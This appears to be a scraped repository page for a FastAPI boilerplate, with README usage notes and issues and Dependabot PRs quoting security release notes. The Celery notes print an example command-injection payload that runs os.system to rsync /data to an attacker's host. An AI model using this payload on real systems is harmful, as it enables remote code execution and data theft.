FastAPI Boilerplate

Hide

Last update: Jan 7, 2023

Related tags

Overview

FastAPI Boilerplate

Features

SQlAlchemy session
Custom user class
Top-level dependency
Dependencies for specific permissions
Celery

SQLAlchemy for asyncio context

Session

from core.db import session

Just import session and use it.

Transaction

To guarantee of transaction, session's autocommit option is True.

So you have to use Transaction class.

from core.db import Transaction, session


@Transaction()
async def create_user(self):
    session.add(User(email="[email protected]"))

Usage as decorator.

from core.db import Transaction, session


with Transaction():
    session.add(User(email="[email protected]"))

Usage as context manager.

In this case, only one transaction is supported.

Note. Do not use explicit commit(). Transaction class automatically do.

Custom user for authentication

from fastapi import Request


@home_router.get("/")
def home(request: Request):
    return request.user.id

Note. you have to pass jwt token via header like Authorization: Bearer 1234

Custom user class automatically decodes header token and store user information into request.user

If you want to modify custom user class, you have to update below files.

core/fastapi/schemas/current_user.py
core/fastapi/middlewares/authentication.py

CurrentUser

class CurrentUser(BaseModel):
    id: int = None

Simply add more fields based on your needs.

AuthBackend

current_user = CurrentUser()

After line 18, assign values that you added on CurrentUser.

Top-level dependency

Note. Available from version 0.62 or higher.

Set a callable function when initialize FastAPI() app through dependencies argument.

Refer Logging class inside of core/fastapi/dependencies/logging.py

Dependencies for specific permissions

Permissions IsAdmin and IsAuthenticated have already been implemented.

from core.fastapi.dependencies import (
    PermissionDependency,
    IsAdmin,
)


user_router = APIRouter()


@user_router.get(
    "",
    response_model=List[GetUserListResponseSchema],
    response_model_exclude={"id"},
    responses={"400": {"model": ExceptionResponseSchema}},
    dependencies=[Depends(PermissionDependency([IsAdmin]))],  # HERE
)
async def get_user_list(limit: int = 10, prev: int = None):
    pass

Insert permission through dependencies argument.

If you want to make your own permission, inherit BasePermission and implement has_permission() function.

Comments

[Question]: What is difference between local and dev environments

I know development and production environments purposes and I've seen using name of local instead of dev for local development. but haven't seen using both of them. Could you guide me what is their difference?

opened by darkido 4
프로젝트 구성에 대한 질문
안녕하세요, 올려주신 작업에 감사합니다. 올려주신 것 기반으로 프로젝트 구성해보려고 하고 있는데 궁금한 것이 있어 질문 드립니다.

Api Layer를 app/resource 하위에 다 넣고 (django 처럼) resouce 별 schema를 같이 모으면 더 불편할까요?

BaseRepo 가 있는데 별도로 활용은 되고 있지 않아서 api -> service -> repository 로 의도하신거라고 보면 될까요?
opened by rumbarum 1
Update `.gitignore`

Related with: #7

제 환경에서는 Pipfile을 이용해 uvicorn 을 설치해도 uvloop가 안깔리던데 아마 윈도우여서 그런거 같습니다 ㅠㅠ

이와는 별개로 각 OS별 사용자들을 위한 설정방법도 제공하면 좋을듯 합니다. Pipfile, config 설정 등 단순히 Run 하기전에 준비해야 되는게 있는데 공부하는 사람들 입장에서는 잘 모를수도 있을거라고 생각되네요..

opened by mirusu400 1
Update `.gitignore`, remove `uvloop` in `Pipfile.lock`
.gitignore 가 필요한 부분만 추가해 놓으셨어서 Github에서 제공하는 기본 파이썬 .gitignore 템플릿으로 변경했습니다.

궃이 Pipfile.lock에 uvloop부분을 삭제했습니다. 삭제한 이유는, 현재 Pipfile을 이용해 설치 시 uvloop와 zipp를 설치하지 않을 뿐더러, 실제 소스코드에서도 사용하지 않고, 결정적으로 로컬 환경에서 테스트 할 때 uvloop는 윈도우 환경을 지원하지 않기 때문에 일부러 지웠습니다. (사실 Pipfile.lock 파일 자체를 지워도 상관없을듯 합니다)

requirements.txt도 추가할려고 했는데 pipenv를 사용하시는거 같아서 다시 지웠습니다.. 개인적으로 venv나 다른 환경을 위해서 추가해주셨으면 하지만 제가 프로젝트 방향을 괜히 꺾어버리는 듯 해서 지운채로 PR 보내드립니다. (커밋은 남아 있습니다)
opened by mirusu400 1
Bump fastapi from 0.63.0 to 0.65.2
Bumps fastapi from 0.63.0 to 0.65.2.

Release notes

Sourced from fastapi's releases.

0.65.2

Security fixes

🔒 Check Content-Type request header before assuming JSON. Initial PR #2118 by @patrickkwang.

This change fixes a CSRF security vulnerability when using cookies for authentication in path operations with JSON payloads sent by browsers.

In versions lower than 0.65.2, FastAPI would try to read the request payload as JSON even if the content-type header sent was not set to application/json or a compatible JSON media type (e.g. application/geo+json).

So, a request with a content type of text/plain containing JSON data would be accepted and the JSON data would be extracted.

But requests with content type text/plain are exempt from CORS preflights, for being considered Simple requests. So, the browser would execute them right away including cookies, and the text content could be a JSON string that would be parsed and accepted by the FastAPI application.

See CVE-2021-32677 for more details.

Thanks to Dima Boger for the security report! 🙇🔒

Internal

🔧 Update sponsors badge, course bundle. PR #3340 by @tiangolo.

🔧 Add new gold sponsor Jina 🎉. PR #3291 by @tiangolo.

🔧 Add new banner sponsor badge for FastAPI courses bundle. PR #3288 by @tiangolo.

👷 Upgrade Issue Manager GitHub Action. PR #3236 by @tiangolo.

0.65.1

Security fixes

📌 Upgrade pydantic pin, to handle security vulnerability CVE-2021-29510. PR #3213 by @tiangolo.

0.65.0

Breaking Changes - Upgrade

⬆️ Upgrade Starlette to 0.14.2, including internal UJSONResponse migrated from Starlette. This includes several bug fixes and features from Starlette. PR #2335 by @hanneskuettner.

Translations

🌐 Initialize new language Polish for translations. PR #3170 by @neternefer.

Internal

👷 Add GitHub Action cache to speed up CI installs. PR #3204 by @tiangolo.

⬆️ Upgrade setup-python GitHub Action to v2. PR #3203 by @tiangolo.

🐛 Fix docs script to generate a new translation language with overrides boilerplate. PR #3202 by @tiangolo.

✨ Add new Deta banner badge with new sponsorship tier 🙇. PR #3194 by @tiangolo.

👥 Update FastAPI People. PR #3189 by @github-actions[bot].

🔊 Update FastAPI People to allow better debugging. PR #3188 by @tiangolo.

0.64.0

Features

... (truncated)

Commits

4d91f97 🔖 Release version 0.65.2

aabe2c7 📝 Update release notes

377234a 🔒 Create Security Policy

38b7858 📝 Update release notes

fa7e3c9 🐛 Check Content-Type request header before assuming JSON (#2118)

90120dd 📝 Update release notes

3677254 🔧 Update sponsors badge, course bundle (#3340)

40bb0c5 📝 Update release notes

60918d2 🔧 Add new gold sponsor Jina 🎉 (#3291)

3afce2c 📝 Update release notes

Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 1
Bump ujson from 5.2.0 to 5.4.0
Bumps ujson from 5.2.0 to 5.4.0.

Release notes

Sourced from ujson's releases.

5.4.0

Added

Add support for arbitrary size integers (#548) @JustAnotherArchivist

Fixed

CVE-2022-31116:

Replace wchar_t string decoding implementation with a uint32_t-based one (#555) @JustAnotherArchivist

Fix handling of surrogates on decoding (#550) @JustAnotherArchivist

CVE-2022-31117: Potential double free of buffer during string decoding @JustAnotherArchivist

Fix memory leak on encoding errors when the buffer was resized (#549) @JustAnotherArchivist

Integer parsing: always detect overflows (#544) @NaN-git

Fix handling of surrogates on encoding (#530) @JustAnotherArchivist

5.3.0

Added

Test Python 3.11 beta (#539) @hugovk

Changed

Benchmark refactor - argparse CLI (#533) @Erotemic

Fixed

Fix segmentation faults when errors occur while handling unserialisable objects (#531) @JustAnotherArchivist

Fix segmentation fault when an exception is raised while converting a dict key to a string (#526) @JustAnotherArchivist

Fix memory leak dumping on non-string dict keys (#521) @JustAnotherArchivist

Fix ref counting on repeated default function calls (#524) @JustAnotherArchivist

Remove redundant wheel dependency from pyproject.toml (#535) @hugovk

Commits

9c20de0 Merge pull request from GHSA-fm67-cv37-96ff

b21da40 Fix double free on string decoding if realloc fails

67ec071 Merge pull request #555 from JustAnotherArchivist/fix-decode-surrogates-2

bc7bdff Replace wchar_t string decoding implementation with a uint32_t-based one

cc70119 Merge pull request #548 from JustAnotherArchivist/arbitrary-ints

4b5cccc Merge pull request #553 from bwoodsend/pypy-ci

abe26fc Merge pull request #551 from bwoodsend/bye-bye-travis

3efb5cc Delete old TravisCI workflow and references.

404de1a xfail test_decode_surrogate_characters() on Windows PyPy.

f7e66dc Switch to musl docker base images.

Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR

@dependabot recreate will recreate this PR, overwriting any edits that have been made to it

@dependabot merge will merge this PR after your CI passes on it

@dependabot squash and merge will squash and merge this PR after your CI passes on it

@dependabot cancel merge will cancel a previously requested merge and block automerging

@dependabot reopen will reopen this PR if it is closed

@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually

@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)

@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

@dependabot use these labels will set the current labels as the default for future PRs for this repo and language

@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language

@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language

@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies
opened by dependabot[bot] 0

Bump pyjwt from 2.3.0 to 2.4.0

Bumps pyjwt from 2.3.0 to 2.4.0.

Release notes

Sourced from pyjwt's releases.

2.4.0

Security

[CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24

What's Changed

Add support for Python 3.10 by @hugovk in jpadilla/pyjwt#699

Don't use implicit optionals by @rekyungmin in jpadilla/pyjwt#705

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#708

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#710

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#711

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#712

documentation fix: show correct scope for decode_complete() by @sseering in jpadilla/pyjwt#661

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#716

Explicit check the key for ECAlgorithm by @estin in jpadilla/pyjwt#713

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#720

api_jwk: Add PyJWKSet.getitem by @woodruffw in jpadilla/pyjwt#725

Update usage.rst by @guneybilen in jpadilla/pyjwt#727

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#728

fix: Update copyright information by @kkirsche in jpadilla/pyjwt#729

Docs: mention performance reasons for reusing RSAPrivateKey when encoding by @dmahr1 in jpadilla/pyjwt#734

Fixed typo in usage.rst by @israelabraham in jpadilla/pyjwt#738

Add detached payload support for JWS encoding and decoding by @fviard in jpadilla/pyjwt#723

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#740

Raise DeprecationWarning for jwt.decode(verify=...) by @akx in jpadilla/pyjwt#742

Don't mutate options dictionary in .decode_complete() by @akx in jpadilla/pyjwt#743

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#748

Replace various string interpolations with f-strings by @akx in jpadilla/pyjwt#744

Update CHANGELOG.rst by @hipertracker in jpadilla/pyjwt#751

New Contributors

@hugovk made their first contribution in jpadilla/pyjwt#699

@rekyungmin made their first contribution in jpadilla/pyjwt#705

@sseering made their first contribution in jpadilla/pyjwt#661

@estin made their first contribution in jpadilla/pyjwt#713

@woodruffw made their first contribution in jpadilla/pyjwt#725

@guneybilen made their first contribution in jpadilla/pyjwt#727

@dmahr1 made their first contribution in jpadilla/pyjwt#734

@israelabraham made their first contribution in jpadilla/pyjwt#738

@fviard made their first contribution in jpadilla/pyjwt#723

@akx made their first contribution in jpadilla/pyjwt#742

@hipertracker made their first contribution in jpadilla/pyjwt#751

Full Changelog: https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0

Changelog

Sourced from pyjwt's changelog.

`v2.4.0 <https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0>`__

Security


- [CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24
Changed

- Explicit check the key for ECAlgorithm by @estin in https://github.com/jpadilla/pyjwt/pull/713
- Raise DeprecationWarning for jwt.decode(verify=...) by @akx in https://github.com/jpadilla/pyjwt/pull/742
Fixed

- Don't use implicit optionals by @rekyungmin in https://github.com/jpadilla/pyjwt/pull/705
- documentation fix: show correct scope for decode_complete() by @sseering in https://github.com/jpadilla/pyjwt/pull/661
- fix: Update copyright information by @kkirsche in https://github.com/jpadilla/pyjwt/pull/729
- Don't mutate options dictionary in .decode_complete() by @akx in https://github.com/jpadilla/pyjwt/pull/743

Added


Add support for Python 3.10 by @hugovk in https://github.com/jpadilla/pyjwt/pull/699
api_jwk: Add PyJWKSet.getitem by @woodruffw in https://github.com/jpadilla/pyjwt/pull/725
Update usage.rst by @guneybilen in https://github.com/jpadilla/pyjwt/pull/727
Docs: mention performance reasons for reusing RSAPrivateKey when encoding by @dmahr1 in https://github.com/jpadilla/pyjwt/pull/734
Fixed typo in usage.rst by @israelabraham in https://github.com/jpadilla/pyjwt/pull/738
Add detached payload support for JWS encoding and decoding by @fviard in https://github.com/jpadilla/pyjwt/pull/723
Replace various string interpolations with f-strings by @akx in https://github.com/jpadilla/pyjwt/pull/744
Update CHANGELOG.rst by @hipertracker in https://github.com/jpadilla/pyjwt/pull/751
</code></pre>
</blockquote>
</details>
<details>
<summary>Commits</summary>

<ul>
<li><a href="https://github.com/jpadilla/pyjwt/commit/83ff831a4d11190e3a0bed781da43f8d84352653"><code>83ff831</code></a> chore: update changelog</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/4c1ce8fd9019dd312ff257b5141cdb6d897379d9"><code>4c1ce8f</code></a> chore: update changelog</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/96f3f0275745c5a455c019a0d3476a054980e8ea"><code>96f3f02</code></a> fix: failing advisory test</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc"><code>9c52867</code></a> Merge pull request from GHSA-ffqj-6fqr-9h24</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/24b29adfebcb4f057a3cef5aaf35653bc0c1c8cc"><code>24b29ad</code></a> Update CHANGELOG.rst (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/751">#751</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/31f5acb8fb3ec6cdfe2b1b0a4a8f329b5f3ca67f"><code>31f5acb</code></a> Replace various string interpolations with f-strings (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/744">#744</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/5581a31c21de70444c1162bcfa29f7e0fc86edda"><code>5581a31</code></a> [pre-commit.ci] pre-commit autoupdate (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/748">#748</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/3d4d82248f1120c87f1f4e0e8793eaa1d54843a6"><code>3d4d822</code></a> Don't mutate options dictionary in .decode_complete() (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/743">#743</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/1f1fe15bb41846c602b3e106176b2c692b93a613"><code>1f1fe15</code></a> Add a deprecation warning when jwt.decode() is called with the legacy verify=...</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/35fa28e59d99b99c6a780d2a029a74d6bbba8b1e"><code>35fa28e</code></a> [pre-commit.ci] pre-commit autoupdate (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/740">#740</a>)</li>
<li>Additional commits viewable in <a href="https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0">compare view</a></li>
</ul>
</details>
<br />


Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.


		                                  
		                                    dependencies


	                                 
										opened  by dependabot[bot]  0


	                        
	                           
	                              
	                                 
	                                 
	                                 
	                              
	                              
	                                 
	                                    
	                                    Bump celery from 5.2.1 to 5.2.2
	                                    
	                                 
	                                  
	                                 
	                                   
		                                   Bumps celery from 5.2.1 to 5.2.2.

Release notes
Sourced from celery's releases.

5.2.2
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security
vulnerability).

When a task fails, the failure information is serialized in the
backend. In some cases, the exception class is only importable
from the consumer's code base. In this case, we reconstruct the
exception class so that we can re-raise the error on the process
which queried the task's result. This was introduced in #4836. If
the recreated exception type isn't an exception, this is a
security issue. Without the condition included in this patch, an
attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data") by
setting the task's result to a failure in the result backend with
the os, the system function as the exception type and the payload
rsync /data [email protected]:~/data as the exception
arguments like so:
{
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}

According to my analysis, this vulnerability can only be exploited
if the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result. The attacker would also have to
gain access to the result backend. The severity of this security
vulnerability is low, but we still recommend upgrading.






Changelog
Sourced from celery's changelog.

5.2.2
:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:
.. code-block:: python
  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }

According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.


.. _version-5.2.1:



Commits

b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
See full diff in compare view





Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.


		                                  
		                                    dependencies 
	                                    
	                                 
	                                 
										opened  by dependabot[bot]  0
									
	                              
	                           
	                        
	                        
	                           
	                              
	                                 
	                                 
	                                 
	                              
	                              
	                                 
	                                    
	                                    Bump pydantic from 1.7.3 to 1.7.4
	                                    
	                                 
	                                  
	                                 
	                                   
		                                   Bumps pydantic from 1.7.3 to 1.7.4.

Release notes
Sourced from pydantic's releases.

v1.7.4 (2021-05-11)
Security fix: Fix date and datetime parsing so passing either 'infinity' or float('inf') (or their negative values) does not cause an infinite loop, see security advisory CVE-2021-29510.



Changelog
Sourced from pydantic's changelog.

v1.7.4 (2021-05-11)

Security fix: Fix date and datetime parsing so passing either 'infinity' or float('inf')
(or their negative values) does not cause an infinite loop,
See security advisory CVE-2021-29510




Commits

e3d1c16 tweak history
b3ecf68 comment out broken tests
4c1fea6 hack tests into passing
f461cb0 prepare for release
80e0dd3 Merge pull request from GHSA-5jqp-qgf6-3pvh
See full diff in compare view





Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.


		                                  
		                                    dependencies 
	                                    
	                                 
	                                 
										opened  by dependabot[bot]  0
									
	                              
	                           
	                        
	                        
	                           
	                              
	                                 
	                                 
	                                 
	                              
	                              
	                                 
	                                    
	                                    Bump uvicorn from 0.11.3 to 0.11.7
	                                    
	                                 
	                                  
	                                 
	                                   
		                                   Bumps uvicorn from 0.11.3 to 0.11.7.

Release notes
Sourced from uvicorn's releases.

Version 0.11.7
0.11.7

SECURITY FIX: Prevent sending invalid HTTP header names and values.
SECURITY FIX: Ensure path value is escaped before logging to the console.

Version 0.11.6

Fix overriding the root logger.

Version 0.11.5

Revert "Watch all files, not just .py" due to unexpected side effects.
Revert "Pass through gunicorn timeout config." due to unexpected side effects.

Version 0.11.4

Use watchgod, if installed, for watching code changes.
Reload application when any files in watched directories change, not just .py files.




Changelog
Sourced from uvicorn's changelog.

0.11.7

SECURITY FIX: Prevent sending invalid HTTP header names and values.
SECURITY FIX: Ensure path value is escaped before logging to the console.

0.11.6

Fix overriding the root logger.

0.11.5

Revert "Watch all files, not just .py" due to unexpected side effects.
Revert "Pass through gunicorn timeout config." due to unexpected side effects.

0.11.4

Use watchgod, if installed, for watching code changes.
Watch all files, not just .py.
Pass through gunicorn timeout config.




Commits

178bee6 Version 0.11.7 (#726)
a796e1d Corrected --proxy-headers client ip/host when using a unix socket (#636)
895807f Quote path component before logging (#724)
789e2f1 Disallow invalid header characters (#725)
81f2136 Brings back windows testing to CI (#685)
f623916 Release version 0.11.6 (#705)
6757386 Removing iocp mentions from documentation (#692)
77468df Add --app-dir option for running uvicorn from any location (#619)
9b92925 Document default backlog setting (#682)
2dcbb13 Fix typo. (#676)
Additional commits viewable in compare view





Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.


		                                  
		                                    dependencies 
	                                    
	                                 
	                                 
										opened  by dependabot[bot]  0
									
	                              
	                           
	                        
	                        
	                           
	                              
	                                 
	                                 
	                                 
	                              
	                              
	                                 
	                                    
	                                    Add QueryParam, FormParam Model for validation through pydantic
	                                    
	                                 
	                                  
	                                 
	                                   
		                                   쿼리 파라미터랑, 폼 파라미터 검증을 pydantic으로 하려고 하니,  pydantic ValidationError는 Client로 내려가지 않도록 한다고 읽었습니다. link
클라 전달을 하기 위해 에러를 수정할까 하다가 pydantic model 로 받을 수 있게 구현한 것 찾아서 추가해 봅니다. link

		                                  
		                                    
	                                    
	                                 
	                                 
										opened  by rumbarum  0
									
	                              
	                           
	                        
	                        
	                           
	                              
	                                 
	                                 
	                                 
	                              
	                              
	                                 
	                                    
	                                    비밀번호 암호화 기능 추가
	                                    
	                                 
	                                  
	                                 
	                                   
		                                   https://github.com/teamhide/fastapi-boilerplate/blob/75c8c82699dd5e3223e8a31fc4fdcbe0f17c5233/app/user/services/user.py#L34-L49
위 소스코드 부분이 사용자를 추가하는 테스트 API 부분인데, 아무래도 비밀번호를 평문으로 저장한다는 것이 좀 걸리네요..
token_helper.py로 JWT 처리에 대한 로직도 있고, AuthBackend를 통해서 Authorization 까지 체크하는 기본적인 보안 기능을 제공하는데 기왕 하는김에 비밀번호 암호화 기능도 추가하는 건 어떤가 싶어 제안해 봅니다. (특히 국내에선 비밀번호 암호화가 법적으로 필수라서 꼭 추가했으면 좋겠네요)
그리고 추가적인 제안인데 JWT 토큰을 사용하는데 API단에서 예시가 없어서 로그인 시 JWT토큰 발급 / Bearer를 통한 JWT 토큰 사용 예시 API까지 추가했으면 하는 바램입니다

		                                  
		                                    
	                                    
	                                 
	                                 
										opened  by mirusu400  2